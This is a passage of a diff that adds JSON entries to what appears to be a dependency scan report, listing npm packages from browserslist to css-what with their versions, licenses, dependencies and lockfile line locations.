"browserslist", + "Identifier": { + "PURL": "pkg:npm/browserslist@4.26.3", + "UID": "9a74e79e111d9f0a" + }, + "Version": "4.26.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "baseline-browser-mapping@2.8.13", + "caniuse-lite@1.0.30001749", + "electron-to-chromium@1.5.233", + "node-releases@2.0.23", + "update-browserslist-db@1.1.3" + ], + "Locations": [ + { + "StartLine": 3803, + "EndLine": 3812 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bser@2.1.1", + "Name": "bser", + "Identifier": { + "PURL": "pkg:npm/bser@2.1.1", + "UID": "135077a78ef7fb4f" + }, + "Version": "2.1.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "node-int64@0.4.0" + ], + "Locations": [ + { + "StartLine": 3814, + "EndLine": 3819 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "buffer@5.7.1", + "Name": "buffer", + "Identifier": { + "PURL": "pkg:npm/buffer@5.7.1", + "UID": "ad55ae4be12e626f" + }, + "Version": "5.7.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1", + "ieee754@1.2.1" + ], + "Locations": [ + { + "StartLine": 3826, + "EndLine": 3832 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "buffer@6.0.3", + "Name": "buffer", + "Identifier": { + "PURL": "pkg:npm/buffer@6.0.3", + "UID": "95d2edd929bc27cf" + }, + "Version": "6.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1", + "ieee754@1.2.1" + ], + "Locations": [ + { + "StartLine": 3834, + "EndLine": 3840 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "buffer-from@1.1.2", + "Name": "buffer-from", + "Identifier": { + "PURL": "pkg:npm/buffer-from@1.1.2", + "UID": "58a51371932dd19" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3821, + "EndLine": 3824 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cacache@19.0.1", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@19.0.1", + "UID": "c208e8bf97b1cbf0" + }, + "Version": "19.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/fs@4.0.0", + "fs-minipass@3.0.3", + "glob@10.4.5", + "lru-cache@10.4.3", + "minipass@7.1.2", + "minipass-collect@2.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "p-map@7.0.3", + "ssri@12.0.0", + "tar@7.5.1", + "unique-filename@4.0.0" + ], + "Locations": [ + { + "StartLine": 3871, + "EndLine": 3885 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cacache@20.0.1", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@20.0.1", + "UID": "17d9bbd7208a5495" + }, + "Version": "20.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/fs@4.0.0", + "fs-minipass@3.0.3", + "glob@11.0.3", + "lru-cache@11.2.2", + "minipass@7.1.2", + "minipass-collect@2.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "p-map@7.0.3", + "ssri@12.0.0", + "unique-filename@4.0.0" + ], + "Locations": [ + { + "StartLine": 3887, + "EndLine": 3900 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "call-bind@1.0.8", + "Name": "call-bind", + "Identifier": { + "PURL": "pkg:npm/call-bind@1.0.8", + "UID": "6f0b0251cc3cab23" + }, + "Version": "1.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-define-property@1.0.1", + "get-intrinsic@1.3.0", + "set-function-length@1.2.2" + ], + "Locations": [ + { + "StartLine": 3910, + "EndLine": 3918 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "call-bind-apply-helpers@1.0.2", + "Name": "call-bind-apply-helpers", + "Identifier": { + "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", + "UID": "ee538c12e6f2c959" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "function-bind@1.1.2" + ], + "Locations": [ + { + "StartLine": 3902, + "EndLine": 3908 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "call-bound@1.0.4", + "Name": "call-bound", + "Identifier": { + "PURL": "pkg:npm/call-bound@1.0.4", + "UID": "34200b601888b3b9" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "get-intrinsic@1.3.0" + ], + "Locations": [ + { + "StartLine": 3920, + "EndLine": 3926 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "callsites@3.1.0", + "Name": "callsites", + "Identifier": { + "PURL": "pkg:npm/callsites@3.1.0", + "UID": "52140db76ac1ceb6" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3928, + "EndLine": 3931 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "camelcase@5.3.1", + "Name": "camelcase", + "Identifier": { + "PURL": "pkg:npm/camelcase@5.3.1", + "UID": "62c73c9a5803ff4d" + }, + "Version": "5.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3942, + "EndLine": 3945 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "camelcase@6.3.0", + "Name": "camelcase", + "Identifier": { + "PURL": "pkg:npm/camelcase@6.3.0", + "UID": "d9bff9fd628abd2e" + }, + "Version": "6.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3947, + "EndLine": 3950 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "camelcase-keys@6.2.2", + "Name": "camelcase-keys", + "Identifier": { + "PURL": "pkg:npm/camelcase-keys@6.2.2", + "UID": "d6cd06d48236c199" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase@5.3.1", + "map-obj@4.3.0", + "quick-lru@4.0.1" + ], + "Locations": [ + { + "StartLine": 3933, + "EndLine": 3940 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "camelize@1.0.1", + "Name": "camelize", + "Identifier": { + "PURL": "pkg:npm/camelize@1.0.1", + "UID": "74447c8256a48095" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3952, + "EndLine": 3955 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "caniuse-lite@1.0.30001749", + "Name": "caniuse-lite", + "Identifier": { + "PURL": "pkg:npm/caniuse-lite@1.0.30001749", + "UID": "f81c8648113ce295" + }, + "Version": "1.0.30001749", + "Licenses": [ + "CC-BY-4.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3957, + "EndLine": 3960 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chalk@2.4.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@2.4.2", + "UID": "da2266337f7117cd" + }, + "Version": "2.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@3.2.1", + "escape-string-regexp@1.0.5", + "supports-color@5.5.0" + ], + "Locations": [ + { + "StartLine": 3962, + "EndLine": 3969 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chalk@4.1.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@4.1.2", + "UID": "526b074f95450f89" + }, + "Version": "4.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "supports-color@7.2.0" + ], + "Locations": [ + { + "StartLine": 3971, + "EndLine": 3977 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chalk@5.6.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@5.6.2", + "UID": "14812de18f462ab2" + }, + "Version": "5.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3979, + "EndLine": 3982 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chownr@1.1.4", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@1.1.4", + "UID": "f7af041634375c52" + }, + "Version": "1.1.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3989, + "EndLine": 3992 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chownr@3.0.0", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@3.0.0", + "UID": "79f0cad64f409f6c" + }, + "Version": "3.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3999, + "EndLine": 4002 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chrome-launcher@0.15.2", + "Name": "chrome-launcher", + "Identifier": { + "PURL": "pkg:npm/chrome-launcher@0.15.2", + "UID": "5775017c7e972334" + }, + "Version": "0.15.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0", + "escape-string-regexp@4.0.0", + "is-wsl@2.2.0", + "lighthouse-logger@1.4.2" + ], + "Locations": [ + { + "StartLine": 4004, + "EndLine": 4012 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chromium-edge-launcher@0.2.0", + "Name": "chromium-edge-launcher", + "Identifier": { + "PURL": "pkg:npm/chromium-edge-launcher@0.2.0", + "UID": "ca15428cda31f4d" + }, + "Version": "0.2.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0", + "escape-string-regexp@4.0.0", + "is-wsl@2.2.0", + "lighthouse-logger@1.4.2", + "mkdirp@1.0.4", + "rimraf@3.0.2" + ], + "Locations": [ + { + "StartLine": 4014, + "EndLine": 4024 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ci-info@2.0.0", + "Name": "ci-info", + "Identifier": { + "PURL": "pkg:npm/ci-info@2.0.0", + "UID": "9667656c8ff1fce7" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4026, + "EndLine": 4029 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ci-info@3.9.0", + "Name": "ci-info", + "Identifier": { + "PURL": "pkg:npm/ci-info@3.9.0", + "UID": "ee8aab342e27132f" + }, + "Version": "3.9.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4031, + "EndLine": 4034 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ci-info@4.3.1", + "Name": "ci-info", + "Identifier": { + "PURL": "pkg:npm/ci-info@4.3.1", + "UID": "ae81f984675175b0" + }, + "Version": "4.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4036, + "EndLine": 4037 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cidr-regex@5.0.1", + "Name": "cidr-regex", + "Identifier": { + "PURL": "pkg:npm/cidr-regex@5.0.1", + "UID": "7eb12cd1ec18776a" + }, + "Version": "5.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ip-regex@5.0.0" + ], + "Locations": [ + { + "StartLine": 4039, + "EndLine": 4042 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cli-columns@4.0.0", + "Name": "cli-columns", + "Identifier": { + "PURL": "pkg:npm/cli-columns@4.0.0", + "UID": "c1cdceccd66c779d" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 4054, + "EndLine": 4058 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cli-cursor@3.1.0", + "Name": "cli-cursor", + "Identifier": { + "PURL": "pkg:npm/cli-cursor@3.1.0", + "UID": "7fd6fdb2ac38e917" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "restore-cursor@3.1.0" + ], + "Locations": [ + { + "StartLine": 4060, + "EndLine": 4065 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cli-spinners@2.9.2", + "Name": "cli-spinners", + "Identifier": { + "PURL": "pkg:npm/cli-spinners@2.9.2", + "UID": "c6224309aac7f1d" + }, + "Version": "2.9.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4067, + "EndLine": 4070 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cliui@7.0.4", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@7.0.4", + "UID": "35cff7c054565126" + }, + "Version": "7.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@7.0.0" + ], + "Locations": [ + { + "StartLine": 4081, + "EndLine": 4088 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cliui@8.0.1", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@8.0.1", + "UID": "4d144a22469cfbaa" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@7.0.0" + ], + "Locations": [ + { + "StartLine": 4090, + "EndLine": 4097 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "clone@1.0.4", + "Name": "clone", + "Identifier": { + "PURL": "pkg:npm/clone@1.0.4", + "UID": "609c6d98d3ba080b" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4099, + "EndLine": 4102 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cmd-shim@7.0.0", + "Name": "cmd-shim", + "Identifier": { + "PURL": "pkg:npm/cmd-shim@7.0.0", + "UID": "daaeba5e74b8f600" + }, + "Version": "7.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4104, + "EndLine": 4105 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "code-point-at@1.1.0", + "Name": "code-point-at", + "Identifier": { + "PURL": "pkg:npm/code-point-at@1.1.0", + "UID": "28a455c43ef757d7" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4112, + "EndLine": 4115 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color@3.2.1", + "Name": "color", + "Identifier": { + "PURL": "pkg:npm/color@3.2.1", + "UID": "b5d61b1fe46e572d" + }, + "Version": "3.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@1.9.3", + "color-string@1.9.1" + ], + "Locations": [ + { + "StartLine": 4191, + "EndLine": 4197 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color@4.2.3", + "Name": "color", + "Identifier": { + "PURL": "pkg:npm/color@4.2.3", + "UID": "5ff2b5275c988769" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@2.0.1", + "color-string@1.9.1" + ], + "Locations": [ + { + "StartLine": 4199, + "EndLine": 4205 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-convert@1.9.3", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@1.9.3", + "UID": "9a6bc06041fada1b" + }, + "Version": "1.9.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.3" + ], + "Locations": [ + { + "StartLine": 4129, + "EndLine": 4134 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-convert@2.0.1", + "Name": "color-convert", + "Identifier": { + "PURL": "pkg:npm/color-convert@2.0.1", + "UID": "fb176e30d2d920a6" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.4" + ], + "Locations": [ + { + "StartLine": 4136, + "EndLine": 4141 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-name@1.1.3", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.3", + "UID": "b29caa2ee2bf2b7" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4153, + "EndLine": 4156 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-name@1.1.4", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@1.1.4", + "UID": "b6888d817f2787bd" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4143, + "EndLine": 4146 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-name@2.0.2", + "Name": "color-name", + "Identifier": { + "PURL": "pkg:npm/color-name@2.0.2", + "UID": "b4259ec1bec03ac5" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4148, + "EndLine": 4151 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-parse@2.0.2", + "Name": "color-parse", + "Identifier": { + "PURL": "pkg:npm/color-parse@2.0.2", + "UID": "89485a6bdc5390bc" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@2.0.2" + ], + "Locations": [ + { + "StartLine": 4158, + "EndLine": 4163 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-rgba@3.0.0", + "Name": "color-rgba", + "Identifier": { + "PURL": "pkg:npm/color-rgba@3.0.0", + "UID": "5384ce812ae48299" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-parse@2.0.2", + "color-space@2.3.2" + ], + "Locations": [ + { + "StartLine": 4165, + "EndLine": 4171 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-space@2.3.2", + "Name": "color-space", + "Identifier": { + "PURL": "pkg:npm/color-space@2.3.2", + "UID": "c1616d97b119ee6d" + }, + "Version": "2.3.2", + "Licenses": [ + "Unlicense" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4173, + "EndLine": 4176 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-string@1.9.1", + "Name": "color-string", + "Identifier": { + "PURL": "pkg:npm/color-string@1.9.1", + "UID": "8e29a89347e24753" + }, + "Version": "1.9.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-name@1.1.4", + "simple-swizzle@0.2.4" + ], + "Locations": [ + { + "StartLine": 4178, + "EndLine": 4184 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "combined-stream@1.0.8", + "Name": "combined-stream", + "Identifier": { + "PURL": "pkg:npm/combined-stream@1.0.8", + "UID": "7ef3f3d5a1f30dbe" + }, + "Version": "1.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "delayed-stream@1.0.0" + ], + "Locations": [ + { + "StartLine": 4212, + "EndLine": 4217 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "commander@12.1.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@12.1.0", + "UID": "ce60549c9cf6e12b" + }, + "Version": "12.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4224, + "EndLine": 4227 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "commander@13.1.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@13.1.0", + "UID": "cf65fc28e03b7a0" + }, + "Version": "13.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4229, + "EndLine": 4232 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "commander@2.20.3", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@2.20.3", + "UID": "cac66995b8514ca9" + }, + "Version": "2.20.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4234, + "EndLine": 4237 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "commander@7.2.0", + "Name": "commander", + "Identifier": { + "PURL": "pkg:npm/commander@7.2.0", + "UID": "3fa9856e38f84954" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4239, + "EndLine": 4242 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "common-ancestor-path@1.0.1", + "Name": "common-ancestor-path", + "Identifier": { + "PURL": "pkg:npm/common-ancestor-path@1.0.1", + "UID": "23be4cd22832fdb4" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4249, + "EndLine": 4250 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "concat-map@0.0.1", + "Name": "concat-map", + "Identifier": { + "PURL": "pkg:npm/concat-map@0.0.1", + "UID": "37f2f832010da5e6" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4272, + "EndLine": 4275 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "connect@3.7.0", + "Name": "connect", + "Identifier": { + "PURL": "pkg:npm/connect@3.7.0", + "UID": "24785918da4a1614" + }, + "Version": "3.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "finalhandler@1.1.2", + "parseurl@1.3.3", + "utils-merge@1.0.1" + ], + "Locations": [ + { + "StartLine": 4277, + "EndLine": 4285 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "console-control-strings@1.1.0", + "Name": "console-control-strings", + "Identifier": { + "PURL": "pkg:npm/console-control-strings@1.1.0", + "UID": "a84d5ff2c4bac0d0" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4287, + "EndLine": 4290 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "convert-source-map@2.0.0", + "Name": "convert-source-map", + "Identifier": { + "PURL": "pkg:npm/convert-source-map@2.0.0", + "UID": "b2837bdb1861eb5" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4297, + "EndLine": 4300 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "core-js@1.2.7", + "Name": "core-js", + "Identifier": { + "PURL": "pkg:npm/core-js@1.2.7", + "UID": "aec58b8e1e146b0d" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4309, + "EndLine": 4312 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "core-util-is@1.0.3", + "Name": "core-util-is", + "Identifier": { + "PURL": "pkg:npm/core-util-is@1.0.3", + "UID": "23141bcce8e9a469" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4314, + "EndLine": 4317 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cosmiconfig@8.3.6", + "Name": "cosmiconfig", + "Identifier": { + "PURL": "pkg:npm/cosmiconfig@8.3.6", + "UID": "69adb9e24fe3bf1d" + }, + "Version": "8.3.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "import-fresh@3.3.1", + "js-yaml@4.1.0", + "parse-json@5.2.0", + "path-type@4.0.0" + ], + "Locations": [ + { + "StartLine": 4319, + "EndLine": 4327 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cross-spawn@7.0.6", + "Name": "cross-spawn", + "Identifier": { + "PURL": "pkg:npm/cross-spawn@7.0.6", + "UID": "f8d5dfd82ca4836c" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-key@3.1.1", + "shebang-command@2.0.0", + "which@2.0.2" + ], + "Locations": [ + { + "StartLine": 4352, + "EndLine": 4359 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-color-keywords@1.0.0", + "Name": "css-color-keywords", + "Identifier": { + "PURL": "pkg:npm/css-color-keywords@1.0.0", + "UID": "af36e1a6d2d209e0" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4361, + "EndLine": 4364 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-line-break@2.1.0", + "Name": "css-line-break", + "Identifier": { + "PURL": "pkg:npm/css-line-break@2.1.0", + "UID": "4598245b64d2d21e" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "utrie@1.0.2" + ], + "Locations": [ + { + "StartLine": 4366, + "EndLine": 4371 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-select@5.2.2", + "Name": "css-select", + "Identifier": { + "PURL": "pkg:npm/css-select@5.2.2", + "UID": "2c9ef9fb87d1c1c7" + }, + "Version": "5.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "boolbase@1.0.0", + "css-what@6.2.2", + "domhandler@5.0.3", + "domutils@3.2.2", + "nth-check@2.1.1" + ], + "Locations": [ + { + "StartLine": 4373, + "EndLine": 4382 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-to-react-native@3.2.0", + "Name": "css-to-react-native", + "Identifier": { + "PURL": "pkg:npm/css-to-react-native@3.2.0", + "UID": "6af2895e2f65e101" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelize@1.0.1", + "css-color-keywords@1.0.0", + "postcss-value-parser@4.2.0" + ], + "Locations": [ + { + "StartLine": 4384, + "EndLine": 4391 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-tree@1.1.3", + "Name": "css-tree", + "Identifier": { + "PURL": "pkg:npm/css-tree@1.1.3", + "UID": "646cd58c47821057" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mdn-data@2.0.14", + "source-map@0.6.1" + ], + "Locations": [ + { + "StartLine": 4393, + "EndLine": 4399 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-tree@2.2.1", + "Name": "css-tree", + "Identifier": { + "PURL": "pkg:npm/css-tree@2.2.1", + "UID": "4fe2005f6811d0c2" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mdn-data@2.0.28", + "source-map-js@1.2.1" + ], + "Locations": [ + { + "StartLine": 4409, + "EndLine": 4415 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-tree@2.3.1", + "Name": "css-tree", + "Identifier": { + "PURL": "pkg:npm/css-tree@2.3.1", + "UID": "5b8f0edcb9f0b00d" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mdn-data@2.0.30", + "source-map-js@1.2.1" + ], + "Locations": [ + { + "StartLine": 4401, + "EndLine": 4407 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "css-what@6.2.2", + "Name": "css-what", + "Identifier": { + "PURL": "pkg:npm/css-what@6.2.2", + "UID": "109907ed858e48e9" + }, + "Version": "6.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4417, + "EndLine": 4420 + } + ], + "AnalyzedBy": 